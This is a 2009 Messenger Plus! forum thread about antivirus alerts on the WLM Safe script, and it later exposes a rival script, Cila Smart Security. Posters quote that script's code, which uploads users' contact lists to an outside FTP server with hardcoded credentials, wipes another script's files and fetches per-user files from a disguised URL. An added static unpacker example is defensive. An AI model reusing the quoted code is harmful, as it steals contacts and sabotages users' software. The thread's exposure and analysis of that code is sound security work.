WLM Safe 4.0 - What is this!
WLM Safe 4.0 - What is this! by BlackStar on 02-09-2009 at 09:55 PM
I just downloaded this new Script called: WLM-Safe-4.0.plsc
There is not much info about it and what it does when checking on their website with the name: wlm-safe.uptodown.com
One of the names on this site is "uptodown". To me it is similar to "downdup" that is a very well-known Trojan.
I just checked the .plsc file on VirusTotal (http://www.virustotal.com/analisis/6c600ae61efd52212f865dbbb19aa287)
And it found this:
a-squared 4.0.0.93 2009.02.09 -
AhnLab-V3 5.0.0.2 2009.02.09 -
AntiVir 7.9.0.76 2009.02.09 -
Authentium 5.1.0.4 2009.02.08 -
Avast 4.8.1335.0 2009.02.09 -
AVG 8.0.0.229 2009.02.09 -
BitDefender 7.2 2009.02.09 -
CAT-QuickHeal 10.00 2009.02.09 -
ClamAV 0.94.1 2009.02.09 -
Comodo 972 2009.02.09 -
DrWeb 4.44.0.09170 2009.02.09 Tool.Prockill
eSafe 7.0.17.0 2009.02.09 Win32.Banker
eTrust-Vet 31.6.6347 2009.02.09 -
F-Prot 4.4.4.56 2009.02.09 -
F-Secure 8.0.14470.0 2009.02.09 -
Fortinet 3.117.0.0 2009.02.09 -
GData 19 2009.02.09 -
Ikarus T3.1.1.45.0 2009.02.09 -
K7AntiVirus 7.10.624 2009.02.09 -
Kaspersky 7.0.0.125 2009.02.09 -
McAfee 5520 2009.02.08 potentially unwanted program PrcViewer
McAfee+Artemis 5521 2009.02.09 potentially unwanted program PrcViewer
Microsoft 1.4306 2009.02.09 -
NOD32 3839 2009.02.09 Win32/PrcView
Norman 6.00.02 2009.02.09 -
nProtect 2009.1.8.0 2009.02.09 -
Panda 9.5.1.2 2009.02.09 -
PCTools 4.4.2.0 2009.02.09 -
Prevx1 V2 2009.02.09 -
Rising 21.15.50.00 2009.02.07 -
SecureWeb-Gateway 6.7.6 2009.02.09 -
Sophos 4.38.0 2009.02.09 -
Sunbelt 3.2.1847.2 2009.02.07 -
Symantec 10 2009.02.09 -
TheHacker 6.3.1.5.250 2009.02.09 Aplicacion/Processor.20
TrendMicro 8.700.0.1004 2009.02.09 PAK_Generic.001
VBA32 3.12.8.12 2009.02.08 -
ViRobot 2009.2.9.1596 2009.02.09 -
VirusBuster 4.5.11.0 2009.02.09 -
Also! In my world this Script sounds too good to be true!
I just made a quick check what it does. And according to the content in this Script's .reg file and .bat file it is really doing a lot of strange things!
Perhaps I am way out here so please correct if I am totally wrong.
But. Perhaps a word of warning is in place here!
RE: WLM Safe 4.0 - What is this! by prashker on 02-09-2009 at 10:35 PM
quote: Originally posted by Moh Zayadi
There is nothing wrong about that script as it's in the scripts database. http://www.msgpluslive.net/scripts/view/505-WLM-Safe/
MenthiX is human though, he let a virus accidentally pass through before ;p
Not saying this one is a virus though, as I have not tested or even heard of this script for that matter
RE: WLM Safe 4.0 - What is this! by Menthix on 02-09-2009 at 10:51 PM
Interesting, thank you very much for letting us know.
NOD32 didn't notify me while checking. I've taken the script offline while I check it out.
Version 4.0 was added just a little over an hour ago, never received any complaint about the older version. "Potentially unwanted" doesn't sound too harmful.
RE: WLM Safe 4.0 - What is this! by MeEtc on 02-10-2009 at 01:21 AM
http://vil.nai.com/vil/content/v_137331.htm
Just sounds like process control, ability to run and terminate running programs. Has legit uses.
RE: WLM Safe 4.0 - What is this! by wincy on 02-10-2009 at 02:34 PM
Hello guys,
I'm Vincenzo (Webbolo), the author of WLM Safe.
I've just read MenthiX's mail and I'm here to try understanding why my script has been removed from scripts' database.
It took me lot of weeks to realize the new version of my script and nobody ever criticized my scripts.
WLM Safe's code can be viewed by everybody, it is not encrypted in any way. The script only contains:
Path.exe - a program used to determine computer's Paths like the name of main hard drive, the %temp% folder and other folders where malwares can hide.
Process.exe - a program used to kill - suspend - resume process, and it's used in "remove.bat" file, (as you can see in source code) to kill infected processes or temporary suspend explorer.exe and msnmsgr.exe (which are re-started at the end of the scan) for a better virus remove. Author of this program:
http://www.beyondlogic.org
regist.reg - a .reg file that removes infected registry keys.
I scanned both .exe files with my Kaspersky and they are not infected.
If you want, I could try to change part of my script, but personally I think it's not right to remove a script that I made with hard work for a long time.
Please, give me more information on what I should change, but I encourage you to check source code if you want. A sentence like "In my world this Script sounds too good to be true!" doesn't offend me. It makes me think that you're envious and makes me proud of my hard work, instead.
Little Note:
wlm-safe.uptodown.com is NOT my website!
My websites are: www.wlmsafe.com and www.webbolo.net
Thank you all.
RE: WLM Safe 4.0 - What is this! by TheGuruSupremacy on 02-10-2009 at 03:01 PM
I can confirm it's not a virus, only a great script... Moreover the scan only says that there is a prcviewer (if an av says a program is a virus it doesn't mean it's really a virus)
RE: WLM Safe 4.0 - What is this! by Jigen90 on 02-10-2009 at 03:13 PM
Hi guys!
I'm one of the beta tester of this great script!
I've tried this many times, I've analyzed the code (with the debugging window of live plus) and I know how it works!
I'm sure, wlm safe is not a virus..constantly(now it has been downloaded by 2100 users) I HAVEN'T HEARD ANY CRITICAL!
It works greatly..it's not a virus!
Kaspersky doesn't say nothing
Avira antivir too
Avg too
Bitdefender too..
It's not a virus, it's a new tool to BLOCK definitely spam and virus links that spread upon windows live messenger!!
RE: WLM Safe 4.0 - What is this! by Jigen90 on 02-10-2009 at 04:35 PM
Sorry for my English...
but I've tried the site posted above.
That site http://www.virustotal.com it's an excellent site, but we have to pay attention.
If we go to http://www.virustotal.com/estadisticas.html we discover an important thing.
In the last 24 hours the site received 74188 files and the 30% was NOT infected, that we can understand from this picture (taken from the site)
( the site says:
"This image shows the number of files that have been detected as infected (red) among the total number of files received within the last 24 hours (clean ones marked in blue).")
Now, if we scroll down the page we arrive to an important new image that reveals us an important consideration:
the site describes the image with:
Red: Infected files which one or more antivirus engines failed to detect as a threat.
Blue: Infected files detected by all antivirus engines.
Now we have to think.
With this graphic we discover that every file that is UPLOADED to the site is ALWAYS, I repeat ALWAYS, (the 99%) signed as a threat.
This comes from: the users over internet upload file to the site for a free scan, but every file uploaded (except the 1%) was an "Infected files which one or more antivirus engines failed to detect as a threat."!
Now or every file that was uploaded was a virus and all the antivirus software didn't detect it or there is always one or more antivirus software that detects the file as a threat!
But with the first image that I posted we discover the truth:
There are always (on that site) FALSE POSITIVE, there are ALWAYS file that are REPORTED AS VIRUS from ONE OF the software!
I hope you understood me, I only say that the report posted in this thread is not so valid IMO.
Thanks BlackStar for the reporting, but I think that we have to understand better what the report says.
IMO WLM SAFE is not a Virus, anyway...if you read the code you simply discover that it doesn't do anything illegal!!!!
FREE WLM SAFE!
RE: WLM Safe 4.0 - What is this! by TheGuruSupremacy on 02-10-2009 at 04:41 PM
Well Menthix knows what he does. To prevent the community from being infected he has removed the script while he is checking if it's really dangerous. The script is clean, the exes attached to the script are not modified and so are clean too, but Menthix has to verify that by himself. Just wait and we will see the script again on the db very soon. Greetings
RE: WLM Safe 4.0 - What is this! by BlackStar on 02-10-2009 at 06:07 PM
@wincy
Thank You very much for Your very relevant answer to some questions about Your script.
Perhaps I am a little paranoid when it comes to and show up some new software that you can't find out what it really does.
Many Antivirus programs also give some false positives, most of us know that, but not all...
But I think it is better to be safe than sorry...
Thanks to Your answer here on this forum we all can now trust Your script and it will probably be a success because if it really works as supposed to, this is something most people will have benefit from.
I am sorry if I gave You problems, but on the other hand...
You gave us all the explanation we needed.
Keep UP The Good Work.
P.S.
Also thank You "Jigen90" and "TheGuruSupremacy" for Your work.
It is good to see that there are people who care!
D.S.
RE: WLM Safe 4.0 - What is this! by wincy on 02-10-2009 at 07:20 PM
It doesn't matter at all BlackStar, do not worry!
I was just really surprised and a little bit hurt when I discovered that my script had been removed...
I often give a look at threads on this forum and find lot of useful information, and i'm sure of what i've done in my script, that's why i gave a fast reply, in order to make things as clear as possible.
I already know about the famous "Nick Plus" containing a virus, that's why i forgive your doubts!
For any other question or information contact me!
Thanks to Jigen90, TheGuruSupremacy and Moh Zayadi for support!
RE: WLM Safe 4.0 - What is this! by Menthix on 02-10-2009 at 07:53 PM
I'm fairly sure the script works as wincy described, but this doesn't take away the problem: several virus scanners will throw alerts when installing the script. It will be hard for users to trust something that is supposed to remove viruses, while the removal tool itself is picked up by several virusscanners.
The virusscanners have problems with Process.exe and path.exe. From reading what they do I think they could fairly easy be replaced by something else that won't cause alerts.
Instead of process.exe you could use Taskkill (http://technet.microsoft.com/en-us/library/bb491009.aspx) which is part of Windows, so you don't even need to pack it with the script. I checked and it's available on XP, Vista and Win7.
path.exe exports a batch file like this:
DOS code:
SET "AppData=C:\DOCUME~1\XP_EN-VM\APPLIC~1"
SET "Cookies=C:\DOCUME~1\XP_EN-VM\Cookies"
SET "Desktop=C:\DOCUME~1\XP_EN-VM\Desktop"
SET "Favorites=C:\DOCUME~1\XP_EN-VM\FAVORI~1"
SET "NetHood=C:\DOCUME~1\XP_EN-VM\NetHood"
SET "Personal=C:\DOCUME~1\XP_EN-VM\MYDOCU~1"
SET "PrintHood=C:\DOCUME~1\XP_EN-VM\PRINTH~1"
SET "Recent=C:\DOCUME~1\XP_EN-VM\Recent"
SET "SendTo=C:\DOCUME~1\XP_EN-VM\SendTo"
SET "Start Menu=C:\DOCUME~1\XP_EN-VM\STARTM~1"
SET "Templates=C:\DOCUME~1\XP_EN-VM\TEMPLA~1"
SET "Programs=C:\DOCUME~1\XP_EN-VM\STARTM~1\Programs"
SET "Startup=C:\DOCUME~1\XP_EN-VM\STARTM~1\Programs\Startup"
SET "Local AppData=C:\DOCUME~1\XP_EN-VM\LOCALS~1\APPLIC~1"
SET "Cache=C:\DOCUME~1\XP_EN-VM\LOCALS~1\TEMPOR~1"
SET "History=C:\DOCUME~1\XP_EN-VM\LOCALS~1\History"
SET "My Pictures=C:\DOCUME~1\XP_EN-VM\MYDOCU~1\MYPICT~1"
SET "Fonts=C:\WINDOWS\Fonts"
SET "My Music=C:\DOCUME~1\XP_EN-VM\MYDOCU~1\MYMUSI~1"
SET "CD Burning=C:\DOCUME~1\XP_EN-VM\LOCALS~1\APPLIC~1\MICROS~1\CDBURN~1"
SET "Common AppData=C:\DOCUME~1\ALLUSE~1\APPLIC~1"
SET "Common Programs=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs"
SET "Common Documents=C:\DOCUME~1\ALLUSE~1\DOCUME~1"
SET "Common Desktop=C:\DOCUME~1\ALLUSE~1\Desktop"
SET "Common Start Menu=C:\DOCUME~1\ALLUSE~1\STARTM~1"
SET "Common Pictures=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYPICT~1"
SET "Common Music=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYMUSI~1"
SET "Common Video=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYVIDE~1"
SET "Common Favorites=C:\DOCUME~1\ALLUSE~1\FAVORI~1"
SET "Common Startup=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup"
SET "Common Templates=C:\DOCUME~1\ALLUSE~1\TEMPLA~1"
SET "Common Administrative Tools=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\ADMINI~1"
I see you use some of those variables later in the batch file (not all). I'm not sure why eSafe and TrendMicro would pick this up. Do you have the source, or did you download it somewhere? This could probably be replaced by JScript too (some other scripter help out on this?).
BTW, two other things:
- You assume Plus! is installed in %ProgramFiles%\"Messenger Plus! Live"\. Your script won't work at all when Plus! is installed in a different folder.
- Why do you delete "Cila Smart Security" in safe.bat?
For people who want to take a look, temporary download location: http://random.menthix.net/temp/WLM-Safe-4.0.plsc
RE: WLM Safe 4.0 - What is this! by wincy on 02-10-2009 at 09:28 PM
Hi MenthiX, thanks for your reply!
I've made up tests with more than one anti-virus before using programs I downloaded from Internet.
They're quite common and largely used, and avg, kaspersky and antivir didn't seem to identify them as dangerous or unwanted programs.
Are you sure that both exe are detected as infected/dangerous?
Thanks for your tip about taskkill! Do you think it could be possible to make the same as path.exe in JScript?
Any help would be really appreciated!
Other things:
quote: You assume Plus! is installed in %ProgramFiles%\"Messenger Plus! Live"\. Your script won't work at all when Plus! is installed in a different folder.
- Didn't mind, how can i determine Messenger Plus' installation directory with a batch file?
quote: Why do you delete "Cila Smart Security" in safe.bat?
- I delete Cila Smart Security for two reasons:
- Cila's script is not compatible with WLM Safe, and it also runs this code:
case "delws":
    fso.DeleteFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml');
    fso.DeleteFolder(Directory + '\\Scripts' + '\\WLM Safe');
    break;
case "inire":
    kickWLMsafe();
    MsgPlus.AddTimer("inire", 60000);
    break;

function kickWLMsafe() {
    if (!fso.FileExists(Directory + "\\Scripts\\" + "WLM Safe" + "\\ScriptInfo.xml")) {} else {
        MsgPlus.DisplayToast(Script_Name, RLFF(LangT, 81) + RLFF(LangT, 82), "", "DelWLMS");
        ErrorNN("821", "WLM Safe");
        TraceIA(RLFF(LangT, 83))
    }
}

function DelWLMS() {
    var fileObj = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml', 2, 0);
    var fileObjA = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\wlmsafe.js', 2, 0);
    fileObj.Write('');
    fileObj.Close();
    fileObjA.Write('');
    fileObjA.Close();
    MsgPlus.AddTimer("delws", 3000)
}
- In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
function MakeConfigEMAIL() {
    Trace("0x222222224");
    var sssp = Messenger.MyEmail;
    var Contacts = Messenger.MyContacts;
    var e = new Enumerator(Contacts);
    for (; ! e.atEnd(); e.moveNext()) {
        var Contact = e.item();
        AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Contact.Email)))
    }
    AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Messenger.MyEmail)));
    UpCEMAIL()
}

function UpCEMAIL() {
    ftpweb = "ftp.cilacorp.x10hosting.com";
    Trace("0x2777777777");
    for (var e = new Enumerator(fso.GetFolder(MsgPlus.ScriptFilesPath + "\\Saves").files); ! e.atEnd(); e.moveNext()) {
        scsulmi = MsgPlus.UploadFileFTP(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + e.item().Name, ftpweb, "msgplus@cilacorp.x10hosting.com", "T9Mrvcjyz81Q", e.item().Name)
    }
}
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
Thanks to all for comprehension, replies and support.
RE: WLM Safe 4.0 - What is this! by NiteMare on 02-11-2009 at 04:13 AM
quote: Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]
well this should be enough to put that script on hold until it can be looked at, and it looks like everything is encrypted in that script, which makes me suspicious
quote: Originally posted by wincy
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
RE: WLM Safe 4.0 - What is this! by roflmao456 on 02-11-2009 at 05:43 AM
* roflmao456 is sniffing some script rivalry coming up o.0
Oh and the ftp login doesn't work
RE: RE: WLM Safe 4.0 - What is this! by Jigen90 on 02-11-2009 at 09:29 AM
quote: Originally posted by roflmao456
Oh and the ftp login doesn't work
I've seen that code and the ftp login has worked till 1 or 2 months ago!
There were 3 o 4 lists of messenger contacts.
I've seen the site, it worked with that password!!
Now it doesn't work...strange!?!?! ...something wrong!?
RE: RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 01:22 PM
quote: Originally posted by NiteMare
quote: Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]
well this should be enough to put that script on hold until it can be looked at, and it looks like everything is encrypted in that script, which makes me suspicious
quote: Originally posted by wincy
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
I was misunderstood, they copy part of my xml file, AND ALSO they pick up users' contact lists.
Here is a screen of my old script version's window and their actual window:
The code is also copy and pasted without changes.
I've never stolen contact lists because i think it is really a privacy violation!
You can check all previous versions of my script, if you want.
Source codes are short, simple, and not encrypted in any way.
Cila Smart Security is totally encrypted, that's why maybe they have something to hide...
I realized that it was an unsafe script when i discovered that about 2 months ago ftp server could be accessed by anyone (even by spammers for example!) with a simple FTP program.
Everybody can check out old version (3.5) here:
http://www.wlmsafe.com/download2.php
More than 24.000 have downloaded that version and it has always been appreciated.
RE: WLM Safe 4.0 - What is this! by vaccination on 02-11-2009 at 01:50 PM
quote: Originally posted by NiteMare
quote: Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]
well this should be enough to put that script on hold until it can be looked at, and it looks like everything is encrypted in that script, which makes me suspicious
quote: Originally posted by wincy
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
A different script did it, not his. So he was combating the invasion of privacy by removing the functions of that script if it was installed on the users PC.
RE: WLM Safe 4.0 - What is this! by Moh on 02-11-2009 at 02:13 PM
If it is that suspicious then why is Cila Security still in the database? o.0
RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 02:17 PM
Because it is not detected as a virus.
But is encrypted with function(p,a,c,k,e,r) (javascript compression)
and maybe nobody ever seen the real code.
If you're interested in, here is decrypted .js file:
http://myfreefilehosting.com/f/ce2d27c610_0.1MB
You can find all functions I quoted above.
RE: WLM Safe 4.0 - What is this! by Spunky on 02-11-2009 at 02:57 PM
js code:
if (Success && Url == "h" + "t" + "t" + "p" + ":" + "/" + "/" + "c" + "i" + "l" + "a" + "." + "m" + "i" + "s" + "s" + "-" + "w" + "e" + "b" + "." + "e" + "s" + "/" + Messenger.MyEmail + "." + "d" + "a" + "t") {
Suspicious
js code:
function kickWLMsafe() {
    if (!fso.FileExists(Directory + "\\Scripts\\" + "WLM Safe" + "\\ScriptInfo.xml")) {} else {
        MsgPlus.DisplayToast(Script_Name, RLFF(LangT, 81) + RLFF(LangT, 82), "", "DelWLMS");
        ErrorNN("821", "WLM Safe");
        TraceIA(RLFF(LangT, 83))
    }
}

function DelWLMS() {
    var fileObj = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml', 2, 0);
    var fileObjA = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\wlmsafe.js', 2, 0);
    fileObj.Write('');
    fileObj.Close();
    fileObjA.Write('');
    fileObjA.Close();
    MsgPlus.AddTimer("delws", 3000)
}
Instant removal. No script should affect any other script in any way
js code:
MsgPlus.DownloadFile("h" + "t" + "t" + "p" + ":" + "/" + "/" + "c" + "i" + "l" + "a" + "." + "m" + "i" + "s" + "s" + "-" + "w" + "e" + "b" + "." + "e" + "s" + "/" + Messenger.MyEmail + "." + "d" + "a" + "t", TempFolder + "\\" + Messenger.MyEmail + ".dat")
Again, Suspicious
Also, it uses my "Clone Warning!" script, which in itself isn't usually a problem for people to use my code. However, in this case it's the whole script with my messagebox replaced with another function
EDIT: I think I might make a better version of this myself. One we all know is going to be safe.
RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 03:06 PM
They also stole (exact copy&paste) my code.
I allow anyone to take inspiration from my work, but it's not funny if someone does an exact clone of scripts.
Anyway, I'm not asking to remove cila's script, I just would like my script to be re-inserted in scripts' database.
If i have to change something before, i will do it as soon as possible.
RE: WLM Safe 4.0 - What is this! by Spunky on 02-11-2009 at 03:15 PM
quote: Originally posted by wincy
Anyway, i'm not asking to remove cila's script, i just would my script to be re-inserted in scripts' database.
If i have to change something before, i will do it as soon as possible.
IMO, they should be substituted...
RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 03:29 PM
Maybe someone should send a notification to Cila's authors?
RE: WLM Safe 4.0 - What is this! by Spunky on 02-11-2009 at 03:36 PM
quote: Originally posted by wincy
Maybe someone should send a notification to Cila's authors?
I'm assuming Menthix contacted you to let you know your script was removed temporarily. He would do the same thing for Cila so they could try to explain it too...
RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 03:42 PM
That's correct. We'll wait for MenthiX then!
I Hope that he will make things go in right way.
RE: WLM Safe 4.0 - What is this! by Menthix on 02-11-2009 at 08:23 PM
There are indeed strange things going on in Cila Smart Security, I deleted the script and will mail the author right after posting this.
BTW: I decoded the current version of WLM Safe, but the code seemed different, is the Engine.js you uploaded from an older version? Also, I'd like to know what you used to keep formatting intact when decrypting. Everything I tried results in all code on a single line.
I have no problem putting WLMSafe back if you make a few changes:
- Stop deleting "Cila Smart Security", no script should delete or disable another script. You'll be happy to know Smart Security won't be coming back to the site as long as it interferes with WLMSafe.
- Update your batch file so it will work when Plus! is installed in a non-standard folder. You probably don't really need to prefix the full installation folder since all the files you call are in the same folder. But if you do, you can call MsgPlus.ScriptFilesPath, see the scripts documentation.
- Replace process.exe by something that won't trigger virusscanners, Taskkill should be suitable.
- Replace path.exe by something that won't trigger virusscanners, you should be able to produce the same result in JScript. If you need help with that you can always post a thread here and ask other scripters for a little help.
RE: WLM Safe 4.0 - What is this! by Spunky on 02-11-2009 at 08:31 PM
quote: Originally posted by MenthiX
BTW: I decoded the current version of WLM Safe, but the code seemed different, is the Engine.js you uploaded from an older version? Also, I'd like to know what you used to keep formatting intact when decrypting. Everything I tried results in all code on a single line.
If I understood it correctly, that is the Cila script he posted. As for formatting, you may need to open it in Wordpad and save it again to regain formatting.
RE: WLM Safe 4.0 - What is this! by Menthix on 02-11-2009 at 08:45 PM
quote: Originally posted by Spunky
If I understood it correctly, that is the Cila script he posted.
It is, I meant it's different from the latest Cila Smart Security that was in the DB.
quote: Originally posted by Spunky
As for formatting, you may need to open it in Wordpad and save it again to regain formatting.
Well, the way I decoded was quite lazy. In Firefox:
1. Copy the eval packed JS. something like —- eval(function(p,a,c,k,e,d){e=function …………………. }
2. Open Error Console on your firefox
3. Paste the packed JS in Code input tab
4. Add eval = alert; at the beginning of the code
5. Hit Evaluate
I don't think you can get any formatting/line breaks back into that result.
RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 09:09 PM
Thanks for your reply MenthiX!
Engine.js i posted is from the last version of Cila Smart Security.
You can unpack it very fast by splitting the file into the various "eval(function(p,a,c,k,e,r){... etc.".
Then go here: http://www.webbolo.net/unpacker.html
Copy each function in the box and hit Decode.
You'll get the unpacked function. Then you can beautify code using this: http://jsbeautifier.org
And you should get exactly the file i posted above.
1) I'm gonna stop deleting Cila smart security, as I hope they will be advised to do the same with my script.
2) I tried not to use Messenger Plus' path but didn't work, maybe because batch files are opened by script and not by clicking directly. I'll try to adjust them.
3) I will also use TaskKill, but really don't know how to determine specials computer's Paths as the exe does... If someone reading this post does know the way, please help. Otherwise i'll post a thread on forum!
Thank you all.
wincy
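The unpacking described in the two posts above (Menthix's eval capture and wincy's split-then-decode), done statically, as an added example that is not part of the original thread or of either script. It reads each packed block's payload and keyword list as data and never evaluates the packed code, folds "h" + "t" + "t" + "p" style string chains, and lists which of the Plus! calls quoted in this thread appear in the result. SAMPLE and all function names are constructed for illustration, and a radix above 62 is not handled.

```javascript
'use strict';
// Added example: static triage of "p,a,c,k,e,r"-packed script text.
// Nothing here calls eval() or Function(); packed text is handled as data.

// Argument list closing each packed block: }('payload',radix,count,'k0|k1'.split('|')
const PACKED_CALL = /\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\s*\.split\('\|'\)/g;

// Names as they appear in the code quoted in the thread; extend for your own review.
const WATCHED = ['Messenger.MyContacts', 'MsgPlus.UploadFileFTP',
  'MsgPlus.DownloadFile', 'fso.DeleteFile', 'fso.DeleteFolder'];

// Decode the escapes of a quoted JS string body without evaluating it.
function unescapeLiteral(body) {
  const simple = { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v', 0: '\0' };
  return body.replace(/\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([\s\S]))/g,
    (match, hex, uni, ch) => {
      if (hex || uni) return String.fromCharCode(parseInt(hex || uni, 16));
      return Object.prototype.hasOwnProperty.call(simple, ch) ? simple[ch] : ch;
    });
}

// The packer's token encoder: index -> word over the alphabet 0-9 a-z A-Z.
function encodeIndex(index, radix) {
  const low = index % radix;
  const digit = low > 35 ? String.fromCharCode(low + 29) : low.toString(36);
  return (index < radix ? '' : encodeIndex(Math.floor(index / radix), radix)) + digit;
}

// Rebuild the packer's dictionary and substitute every token in the payload.
function unpackOne(payload, radix, count, keywords) {
  if (radix < 2 || radix > 62) throw new RangeError('unsupported radix: ' + radix);
  const dict = new Map();
  const limit = Math.min(count, keywords.length); // never trust the declared count
  for (let i = 0; i < limit; i++) {
    const token = encodeIndex(i, radix);
    dict.set(token, keywords[i] || token); // empty keyword: token stands for itself
  }
  return payload.replace(/\b\w+\b/g, (word) => (dict.has(word) ? dict.get(word) : word));
}

// Decode every packed block in `source`; layers packed inside a decoded block
// are followed up to `maxDepth`, and only the innermost text is returned.
function unpackAll(source, maxDepth = 5) {
  const out = [];
  for (const m of source.matchAll(PACKED_CALL)) {
    const text = unpackOne(unescapeLiteral(m[1]), Number(m[2]), Number(m[3]),
      unescapeLiteral(m[4]).split('|'));
    const inner = maxDepth > 1 ? unpackAll(text, maxDepth - 1) : [];
    out.push(...(inner.length ? inner : [text]));
  }
  return out;
}

// Collapse "h" + "t" + "t" + "p" style literal chains so URLs become readable.
// A reading aid, not a rewriter: it skips a literal followed by . [ or (.
function foldStringConcat(text) {
  const pair = /"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"(?!\s*[.\[(])/g;
  let prev;
  do {
    prev = text;
    text = text.replace(pair, (match, a, b) => '"' + a + b + '"');
  } while (text !== prev);
  return text;
}

// Which watched names occur in the decoded text.
function flagCalls(text) {
  return WATCHED.filter((name) => text.includes(name));
}

// Unpack, fold and flag: one record per packed block found in the file.
function triage(source) {
  return unpackAll(source).map((raw) => {
    const code = foldStringConcat(raw);
    return { code, flags: flagCalls(code) };
  });
}

// Constructed sample (not from the thread): one block packed with radix 8.
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0 1=2.3;4.5(6,7);',8,8,'var|list|Messenger|MyContacts|MsgPlus|UploadFileFTP|path|host'.split('|'),0,{}))`;

console.log(triage(SAMPLE));
```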
Thanks! by wincy on 05-25-2009 at 05:08 PM
I've just released WLM Safe 5.0
A Big thanks to Menthix for making it a featured script!
I made it without using external exe file and generally improved almost everything.
I hope it will really help people fighting the spread of dangerous or annoying links!
If someone want to try it, here's the link:
http://www.msgpluslive.net/scripts/view/505-WLM-Safe
( comments/suggestions will be appreciated! )
RE: WLM Safe 4.0 - What is this! by BlackStar on 05-25-2009 at 06:21 PM
Nice done, nice work!
I think I will trust this version now
According to Virustotal there was only one result:
AntiVir 7.9.0.168 2009.05.25 HEUR/HTML.Malware
According to Avira:
quote: A heuristic detection might be a false identification if one or more of the following are true:
- The site hosting the detected file has been accessed for a very long time and is known to the user
- The detected file is from a trustworthy source
RE: WLM Safe 4.0 - What is this! by wincy on 05-25-2009 at 07:33 PM
Thanks for your trust!
RE: WLM Safe 4.0 - What is this! by CookieRevised on 05-25-2009 at 07:49 PM
few things came to my mind after reading this thread:
- Personally I will never use a script which uses EXEs and BATs in such a way, safe or not. Everything those EXEs and BATs do can easily be done with a few lines of scripting code.
- quote: Originally posted by Menthix
I have no problem putting WLMSafe back if you make a few changes:- Stop deleting "Cila Smart Security", no script should delete or disable another script. You'll be happy to know Smart Security won't be coming back to the site as long as it interferes with WLMSafe.
If all the stuff posted here about "Cila Smart Security" is true then WLMSafe has every right to instantly remove every trace of it (and be listed in the DB) and "Cila Smart Security" (and its author) should be banned from the DB as it very obviously has malicious intends.
- uploading Plus! scripts to online virusscanners is not a foolproof method. For starters, online scanners usually are made for checking EXEs and COMs, not javascript. Second, there are a lot of Plus! specific objects in Plus! scripting which no virusscanner will recognize, yet might be very dangerous. Uploading the accompanying program files like those EXEs to online scanners is a much better thing to do.
- Again about "Cila Smart Security". See private forum...
RE: WLM Safe 4.0 - What is this! by Menthix on 05-25-2009 at 08:02 PM
You're reading a mostly old thread Cookie.
- The current WLM Safe version does not use any exe/bat.
- All of Cila's scripts were removed months ago
RE: WLM Safe 4.0 - What is this! by CookieRevised on 05-25-2009 at 08:12 PM
I know it is an old thread and that WLMSafe has been updated and Cila's scripts have been removed, but that doesn't matter. Those aren't the issues here, those things are only examples of issues which are still very valid for any future script. Hence why I made that post.
- About script using EXEs, COMs => I still feel the same about them. And in 99,999% of all cases those programs can all be replaced with simple script code.
- About that policy that WLMSafe was removed because it 'touched' another (malicious) script => As I said, I rather have a security script doing the same thing with another malicious script in the DB as WLMSafe did than to see a perfectly valid script being removed because it tries to protect a user from malicious stuff simply because it 'touches' another script.
